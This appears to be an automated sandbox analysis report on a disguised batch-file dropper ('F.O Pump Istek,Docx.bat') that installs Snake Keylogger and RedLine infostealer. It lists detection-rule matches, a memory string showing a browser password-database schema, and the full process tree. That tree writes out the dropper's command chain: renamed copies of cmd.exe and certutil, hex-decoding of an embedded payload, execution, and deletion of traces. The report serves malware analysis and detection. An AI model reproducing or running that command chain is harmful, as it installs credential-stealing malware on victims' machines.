              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winBAT@42/18@5/4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1232B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF7AB1232B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF792DD826C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF7AB14FB54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D174EC CoCreateInstance,CoCreateInstance,#357,#357,SysFreeString,SysFreeString,LocalFree,SysStringByteLen,SysFreeString,lstrcmpW,lstrcmpW,SysStringByteLen,lstrcmpW,LocalFree,SysStringByteLen,GetLastError,#357,SysStringByteLen,GetLastError,#357,#357,LocalFree,#357,lstrcmpW,SysStringByteLen,SysStringByteLen,#357,SysStringByteLen,#357,#357,LocalFree,SysFreeString,SysFreeString,SysFreeString,LocalFree,SysFreeString,7_2_00007FF792D174EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D673F0 GetModuleHandleW,GetLastError,#357,FindResourceW,GetLastError,LoadResource,GetLastError,SizeofResource,LockResource,GetLastError,LocalAlloc,memmove,7_2_00007FF792D673F0
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
              Source: C:\Users\Public\Libraries\spoolsv.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Cneehezx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: xzeheenC.pif, 00000010.00000002.2761760799.000000002C68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329E1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A3B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329FF000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A47000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033A5B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.00000000329F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.000000002387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: F.O Pump Istek,Docx.batReversingLabs: Detection: 23%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COMJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
